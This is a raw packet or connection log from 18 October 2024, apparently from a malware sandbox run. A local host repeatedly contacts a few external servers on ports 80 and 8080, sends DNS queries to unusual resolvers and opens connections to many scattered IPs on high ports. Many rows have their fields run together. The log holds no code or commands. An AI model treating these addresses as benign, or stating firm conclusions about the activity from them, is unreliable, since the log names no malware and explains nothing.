Oct 18, 2024 12:45:11.224070072 CEST  50055        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:11.828279018 CEST  50056        8080       192.168.2.9      190.120.227.91
Oct 18, 2024 12:45:11.884006977 CEST  8080         50056      190.120.227.91   192.168.2.9
Oct 18, 2024 12:45:11.884161949 CEST  50056        8080       192.168.2.9      190.120.227.91
Oct 18, 2024 12:45:11.938774109 CEST  50056        8080       192.168.2.9      190.120.227.91
Oct 18, 2024 12:45:11.943773031 CEST  8080         50056      190.120.227.91   192.168.2.9
Oct 18, 2024 12:45:15.957814932 CEST  50056        8080       192.168.2.9      190.120.227.91
Oct 18, 2024 12:45:16.502567053 CEST  50055        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:16.502826929 CEST  50057        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:16.529428005 CEST  80           50057      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:16.529561996 CEST  50057        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:16.531120062 CEST  80           50055      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:16.531183958 CEST  50055        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:16.550440073 CEST  50057        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:16.555803061 CEST  80           50057      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:17.699736118 CEST  80           50057      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:17.699767113 CEST  80           50057      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:17.699784040 CEST  80           50057      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:17.699820995 CEST  50057        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:17.699868917 CEST  50057        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:17.893649101 CEST  50058        8080       192.168.2.9      190.120.227.91
Oct 18, 2024 12:45:17.908247948 CEST  8080         50058      190.120.227.91   192.168.2.9
Oct 18, 2024 12:45:17.908341885 CEST  50058        8080       192.168.2.9      190.120.227.91
Oct 18, 2024 12:45:17.932123899 CEST  50058        8080       192.168.2.9      190.120.227.91
Oct 18, 2024 12:45:17.937992096 CEST  8080         50058      190.120.227.91   192.168.2.9
Oct 18, 2024 12:45:21.957273006 CEST  50058        8080       192.168.2.9      190.120.227.91
Oct 18, 2024 12:45:22.440468073 CEST  50057        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:22.440767050 CEST  50059        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:22.448754072 CEST  80           50059      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:22.448846102 CEST  50059        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:22.449258089 CEST  80           50057      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:22.449321032 CEST  50057        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:22.511851072 CEST  50059        80         192.168.2.9      185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:22.518661022 CEST8050059185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.641213894 CEST8050059185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.641271114 CEST8050059185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.641330004 CEST8050059185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.641333103 CEST5005980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.641380072 CEST5005980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.641380072 CEST5005980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.641710997 CEST8050059185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.641753912 CEST5005980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.686472893 CEST500608080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.716403008 CEST808050060190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.716497898 CEST500608080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.722795963 CEST500608080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.756277084 CEST808050060190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:27.761667967 CEST500608080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.226284027 CEST5005980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.226587057 CEST5006180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.231607914 CEST8050061185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.231695890 CEST5006180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.231964111 CEST8050059185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.232024908 CEST5005980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.268994093 CEST5006180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.274990082 CEST8050061185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.316989899 CEST8050061185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.317040920 CEST8050061185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.317079067 CEST8050061185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.317114115 CEST8050061185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.317116022 CEST5006180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.317194939 CEST5006180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.317195892 CEST5006180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.627974987 CEST500628080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.633363008 CEST808050062190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.633445978 CEST500628080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.672257900 CEST500628080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.680347919 CEST808050062190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.003213882 CEST5006380192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.008198023 CEST8050063194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.008270979 CEST5006380192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.008384943 CEST5006380192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.013412952 CEST8050063194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.211025953 CEST5006180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.216461897 CEST8050061185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.216552019 CEST5006180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.753047943 CEST500628080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:34.945825100 CEST5006480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:34.951687098 CEST8050064185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:34.951759100 CEST5006480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:35.067480087 CEST5006480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:35.072963953 CEST8050064185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:36.073040009 CEST8050064185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:36.073067904 CEST8050064185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:36.073091984 CEST8050064185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:36.073106050 CEST8050064185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:36.073122025 CEST8050064185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:36.073156118 CEST5006480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:36.073224068 CEST5006480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:38.939764023 CEST8050063194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:38.986659050 CEST5006380192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:39.113240957 CEST8050063194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:39.113332987 CEST5006380192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:42.179964066 CEST5006380192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:42.184865952 CEST8050063194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:51.213104010 CEST8050064185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:51.213186979 CEST5006480192.168.2.9185.53.178.50
Timestamp                               Source Port    Dest Port    Source IP         Dest IP
Oct 18, 2024 12:41:30.928544998 CEST    55596          1473         192.168.2.9       94.76.206.19
Oct 18, 2024 12:41:31.455005884 CEST    55597          5683         192.168.2.9       46.45.148.196
Oct 18, 2024 12:41:32.702570915 CEST    55598          5750         192.168.2.9       83.222.184.130
Oct 18, 2024 12:41:32.859656096 CEST    55599          5010         192.168.2.9       58.140.114.152
Oct 18, 2024 12:41:33.372383118 CEST    55600          4630         192.168.2.9       80.178.242.19
Oct 18, 2024 12:41:33.716404915 CEST    60195          53           192.168.2.9       1.1.1.1
Oct 18, 2024 12:41:33.781296015 CEST    53             60195        1.1.1.1           192.168.2.9
Oct 18, 2024 12:41:33.985239029 CEST    60196          6800         192.168.2.9       61.95.152.112
Oct 18, 2024 12:41:34.493061066 CEST    60197          7066         192.168.2.9       220.94.117.230
Oct 18, 2024 12:41:35.125363111 CEST    60198          4840         192.168.2.9       58.85.93.82
Oct 18, 2024 12:41:45.760185003 CEST    51659          53           192.168.2.9       1.1.1.1
Oct 18, 2024 12:41:45.803855896 CEST    53             51659        1.1.1.1           192.168.2.9
Oct 18, 2024 12:41:45.805519104 CEST    61476          53           192.168.2.9       1.1.1.1
Oct 18, 2024 12:41:45.858596087 CEST    53             61476        1.1.1.1           192.168.2.9
Oct 18, 2024 12:41:45.860176086 CEST    62298          53           192.168.2.9       1.1.1.1
Oct 18, 2024 12:41:45.925499916 CEST    53             62298        1.1.1.1           192.168.2.9
Oct 18, 2024 12:41:45.940160990 CEST    50137          53           192.168.2.9       1.1.1.1
Oct 18, 2024 12:41:45.973551989 CEST    53             50137        1.1.1.1           192.168.2.9
Oct 18, 2024 12:41:45.975197077 CEST    60780          53           192.168.2.9       1.1.1.1
Oct 18, 2024 12:41:45.990966082 CEST    53             60780        1.1.1.1           192.168.2.9
Oct 18, 2024 12:41:45.995835066 CEST    62476          53           192.168.2.9       178.17.170.133
Oct 18, 2024 12:41:46.042836905 CEST    62476          53           192.168.2.9       178.17.170.133
Oct 18, 2024 12:41:46.126920938 CEST    62476          53           192.168.2.9       178.17.170.133
Oct 18, 2024 12:41:46.235937119 CEST    62476          53           192.168.2.9       178.17.170.133
Oct 18, 2024 12:41:46.287127018 CEST    62476          53           192.168.2.9       178.17.170.133
Oct 18, 2024 12:41:46.359395027 CEST    54194          53           192.168.2.9       1.1.1.1
Oct 18, 2024 12:41:46.402256966 CEST    53             54194        1.1.1.1           192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.403953075 CEST6085253192.168.2.9185.14.29.140
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.475657940 CEST6085253192.168.2.9185.14.29.140
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.584338903 CEST6085253192.168.2.9185.14.29.140
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.682921886 CEST6085253192.168.2.9185.14.29.140
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.820609093 CEST6085253192.168.2.9185.14.29.140
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.852056026 CEST6234753192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.855381012 CEST623481473192.168.2.994.76.206.19
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.873182058 CEST53623471.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.876058102 CEST4985853192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.954793930 CEST53498581.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.957289934 CEST6412153192.168.2.9178.63.145.236
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:47.433825016 CEST641225683192.168.2.946.45.148.196
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:48.061393023 CEST6412153192.168.2.9178.63.145.236
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:48.082283020 CEST641235750192.168.2.983.222.184.130
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:48.566519976 CEST562935010192.168.2.958.140.114.152
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.053002119 CEST6412153192.168.2.9178.63.145.236
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.083185911 CEST562944630192.168.2.980.178.242.19
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.596508980 CEST616886800192.168.2.961.95.152.112
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:50.112483978 CEST616897066192.168.2.9220.94.117.230
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:50.628000021 CEST616904840192.168.2.958.85.93.82
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:51.055744886 CEST6412153192.168.2.9178.63.145.236
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.075635910 CEST6412153192.168.2.9178.63.145.236
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:59.105410099 CEST5652553192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:59.288327932 CEST53565251.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:59.290870905 CEST5125553192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:59.305176020 CEST53512551.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:59.306948900 CEST5678053192.168.2.937.187.0.40
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:00.330467939 CEST5678053192.168.2.937.187.0.40
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.356071949 CEST5678053192.168.2.937.187.0.40
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.864795923 CEST500974876192.168.2.9195.42.129.188
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:03.044513941 CEST500989674192.168.2.981.180.90.149
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:03.378263950 CEST5678053192.168.2.937.187.0.40
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:03.383953094 CEST500998112192.168.2.9113.190.137.239
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:03.922806978 CEST501004375192.168.2.989.45.97.101
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:04.435332060 CEST501014882192.168.2.9203.110.84.90
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:05.034684896 CEST501026989192.168.2.9121.243.130.85
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.050906897 CEST501036219192.168.2.9124.123.112.184
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.366738081 CEST501044611192.168.2.9121.135.15.57
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.394680023 CEST5678053192.168.2.937.187.0.40
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:11.416029930 CEST6145353192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:11.427833080 CEST53614531.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:11.429898977 CEST5362253192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:11.696217060 CEST5362253192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:11.994323969 CEST5362253192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.274817944 CEST5362253192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.540767908 CEST5362253192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.809606075 CEST5289453192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.822495937 CEST53528941.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.824693918 CEST6316653192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.944771051 CEST6316653192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:14.969053030 CEST6316653192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:16.997417927 CEST623275878192.168.2.9122.169.249.87
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.168519974 CEST6316653192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.299628973 CEST623286511192.168.2.9183.83.119.156
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.806797028 CEST623296296192.168.2.9195.174.68.81
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:19.519413948 CEST623306380192.168.2.977.81.225.89
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:20.287714005 CEST623315960192.168.2.9195.174.143.33
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:20.659035921 CEST623325415192.168.2.9117.239.49.110
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:21.193299055 CEST6316653192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:21.194767952 CEST623335310192.168.2.9115.119.58.98
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:21.754695892 CEST623344876192.168.2.993.114.177.116
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:25.208158016 CEST5017453192.168.2.98.8.8.8
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:25.218403101 CEST53501748.8.8.8192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.149214029 CEST501754294192.168.2.9124.30.139.5
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.453645945 CEST5234853192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.807610989 CEST53523481.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.833549976 CEST4957853192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.856287003 CEST53495781.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.858210087 CEST6411353192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.879431963 CEST53641131.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.914700985 CEST5557253192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.926701069 CEST53555721.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.928569078 CEST6091753192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.941551924 CEST53609171.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.943326950 CEST5240653192.168.2.9178.17.170.133
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.995310068 CEST5240653192.168.2.9178.17.170.133
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.049387932 CEST5240653192.168.2.9178.17.170.133
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.111963987 CEST5240653192.168.2.9178.17.170.133
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.152426004 CEST5240653192.168.2.9178.17.170.133
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.213438034 CEST6277453192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:31.993000984 CEST5570553192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:32.003139973 CEST53557051.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:32.004920959 CEST6121753192.168.2.937.187.0.40
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:33.019095898 CEST6121753192.168.2.937.187.0.40
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:33.177000046 CEST612185376192.168.2.9196.201.128.232
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:34.173814058 CEST6121753192.168.2.937.187.0.40
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:34.180002928 CEST612198012192.168.2.914.46.86.152
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:35.003988981 CEST612205285192.168.2.9189.43.156.4
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:35.581768990 CEST612218100192.168.2.986.55.89.177
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:36.207508087 CEST6121753192.168.2.937.187.0.40
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:36.372050047 CEST612226780192.168.2.979.114.248.250
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:36.878721952 CEST612236704192.168.2.9195.144.14.69
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:37.472374916 CEST612245293192.168.2.9187.0.231.113
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:37.988590002 CEST612256390192.168.2.985.122.42.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:40.610044956 CEST6121753192.168.2.937.187.0.40
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:44.680383921 CEST6254153192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:44.691513062 CEST53625411.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:44.693070889 CEST6228253192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.006944895 CEST6228253192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.284589052 CEST6228253192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.566601038 CEST6228253192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.862570047 CEST6228253192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:46.677217007 CEST5988253192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:46.686969042 CEST53598821.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:46.688342094 CEST6432753192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:47.677342892 CEST6432753192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:48.463772058 CEST643284596192.168.2.994.62.138.226
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:48.707534075 CEST6432753192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:49.317152977 CEST643296636192.168.2.995.64.85.169
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:50.143774986 CEST643308032192.168.2.9189.56.86.165
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:50.711088896 CEST643316870192.168.2.9201.92.253.229
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:50.723176956 CEST6432753192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:51.591650009 CEST643326832192.168.2.9113.21.72.31
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:52.065113068 CEST643336964192.168.2.989.34.99.99
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:52.644644022 CEST643347866192.168.2.9200.216.212.147
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:53.222908020 CEST643355107192.168.2.977.81.232.22
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:54.769339085 CEST6432753192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:58.886259079 CEST6331653192.168.2.98.8.8.8
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:58.950903893 CEST53633168.8.8.8192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:03.528886080 CEST633174570192.168.2.993.114.176.239
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:04.409843922 CEST633187451192.168.2.9124.123.92.252
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:05.212589025 CEST633195708192.168.2.9118.94.216.63
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:05.532147884 CEST6324153192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:05.549776077 CEST53632411.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:05.743879080 CEST6058153192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:05.766468048 CEST53605811.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:05.910610914 CEST5068753192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:05.957582951 CEST53506871.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.081172943 CEST506886870192.168.2.9183.83.188.123
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.126422882 CEST6277953192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.135688066 CEST53627791.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.303280115 CEST5548953192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.321894884 CEST53554891.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.329195023 CEST5091153192.168.2.9178.17.170.133
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.393614054 CEST5091153192.168.2.9178.17.170.133
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.472259045 CEST5091153192.168.2.9178.17.170.133
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.723406076 CEST509124410192.168.2.990.148.247.149
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.808763981 CEST5091153192.168.2.9178.17.170.133
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.850502968 CEST5091153192.168.2.9178.17.170.133
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.894366980 CEST5325753192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.903212070 CEST53532571.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.904562950 CEST5018353192.168.2.9185.14.29.140
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.923754930 CEST5018353192.168.2.9185.14.29.140
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.944577932 CEST5018353192.168.2.9185.14.29.140
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.009167910 CEST5018353192.168.2.9185.14.29.140
